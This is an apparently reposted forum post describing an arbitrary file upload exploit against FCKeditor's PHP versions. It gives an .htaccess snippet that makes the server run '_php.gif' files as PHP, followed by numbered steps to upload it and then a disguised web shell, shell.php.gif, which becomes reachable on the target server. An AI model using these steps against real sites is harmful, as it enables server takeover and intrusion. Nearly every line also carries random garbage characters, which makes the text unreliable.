FCKeditor所有php版本Upload上传漏洞; f5 h0 x! s, Q
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07, F3 ~7 t, l+ t* f; U: D. C8 v
减小字体 增大字体 ^2 r' J, A7 ~ q
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
6 _9 \4 C" S( G[+] Date: 20112 p7 V3 J; U4 u# i
[+] Author : sinesafe.cn
5 V$ P5 r/ N' p) L[+] Website : WwW.sinesafe.cn4 N: z1 H6 f* \& u7 U! @
———————————————————. C& ~- W$ g5 H3 \+ a6 U
1.create a htaccess file:: t1 D7 H% |/ B! k! q
code:
& V5 i# Z( Z# r+ u0 z( v<FilesMatch “_php.gif”>
- T! A9 f0 P8 J* ~# a' N4 A4 tSetHandler application/x-httpd-php" q/ q: [# L( j# P9 B8 V
</FilesMatch># f+ |" d$ r: ~1 O6 B/ ~
* b" v7 H9 E3 j! }$ X
2.Now upload this htaccess with FCKeditor.
' M/ }2 [3 l6 r: D, Y& j1 n+ M1 T& ]2 `; {! z$ \
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html4 ?9 }& y; t( |, J, _! A$ B# x* s
% L: \7 N7 U1 Z8 a
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
2 {, x# V, D7 M4 @
/ l" t! l6 c) A1 d9 G3 o———————————————————————————————-
: p" h3 H: `7 j1 X, _3.Now upload shell.php.gif with FCKeditor.
2 E8 [9 Q8 z/ h7 L* R1 R, L, Z7 |7 Z4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.# _. V" C( X0 ^; r" F) W a: f ^! d
5.http://www.sinesafe.cn/anything/shell_php.gif; ^0 [1 p, N3 z( F8 i
6.Now shell is available from server. |
7 S, e3 t' h# {* {4 w7 v& W- d/ m0 _
" p8 E: @- m% t6 D |
发表于 2013-10-27 17:25:21
收藏
支持
反对